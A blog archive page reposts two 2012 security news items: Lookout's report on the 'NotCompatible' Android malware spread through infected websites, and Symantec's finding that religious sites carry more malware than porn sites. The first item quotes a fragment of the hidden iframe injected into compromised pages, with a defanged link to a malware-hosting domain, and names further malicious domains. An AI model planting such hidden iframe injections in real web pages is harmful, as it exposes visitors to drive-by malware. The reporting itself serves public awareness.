Showing posts with label malware. Show all posts
Showing posts with label malware. Show all posts

Wednesday, May 9, 2012

New Android malware spreads via infected websites

google, android, malware, security, browser, infection, spyware, lookout, viruses, notcompatib
Mobile security firm, Lookout, warns of a new malware which may be spreading itself to unsuspecting Android handsets and tablets. Coined as "NotCompatible", the malware is being propagated via Android's web browser which is thought to be a first for the mobile OS.
Before mass panic sets in through, there are a couple of things Android users should know. First, the malware doesn't seem to do anything malicious -- not yet. Secondly, NotCompatible still requires user intervention in order to install it.
Although viruses, trojans and other digital nasties commonly exploit browser vulnerabilities in the computer realm, there have been very few examples of this in the mobile universe. NotCompatible doesn't actually exploit Android's web browser; moreover, it takes advantage of some poor design decisions which can be used to trick less sophisticated users into installing it.
Here's how it works: The bug lives in a hidden iframe on infected websites. The malware then spreads itself by sending an infected .apk file to the user's phone or tablet guised as an automatic download (which Android's browser allows). As with any virus or malware, just downloading it isn't enough though -- it needs to be executed. Once the file is finished downloading, the website alerts the user that a new system update is available. If an unsuspecting user falls for the notification, it will install the .apk file and give NotCompatible ongoing access to the device.
Infected websites commonly have the following code inserted into the bottom of each page:
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
Source: blog.mylookout.com
Although NotCompatible doesn't have any known payload or risk at the moment, it is possible that the malware could function as a trojan or proxy to something more malicious.
Two domains which currently house the malware, gaoanalitics.info and androidonlinefix.info, were singled out. According to Lookout though, there are many more. The firm also says the command and control domain seems to be notcompatibleapp.eu which happens to be the origin of its namesake.
View the original article here

Religious websites are three times riskier than porn sites for malware

malware, symant

Religious and ideological web pages are more dangerous than pornographic sites with regard to malware infection according to the latest Internet Security Threat Report (PDF) from Symantec. In fact, pages featuring adult content didn’t even make the top five most infected list, instead placing tenth overall.

Symantec found that religion-based sites on average have three times the number of threats as opposed to pornographic sites. It may sound a bit farfetched but the reasoning behind the numbers is pretty legitimate.

The security firm believes that because pornographic website owners already make money from the service they provide, they have a vested interest in maintaining a satisfied customer base. Loading a customer’s computer with click-generating malware would, in the short term, net increased revenue from fraudulent ad clicks but at the same time, would drive away repeat business. It’s a business model that’s ultimately set up for failure.

Hackers know that “trusted” sites like those based around religion generally seem safer to the public and as such, make a perfect target for malware.

Topping the list of most dangerous website categories for 2011 was blogs / web communications sites, followed by hosting / personal hosted sites and business / economy pages; shopping sites and education / reference pages round out the top five.

Data from the report was collected through the Symantec Global Intelligence Network which is comprised of nearly 65 million “attack sensors” that monitor activity in more than 200 countries.


View the original article here

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes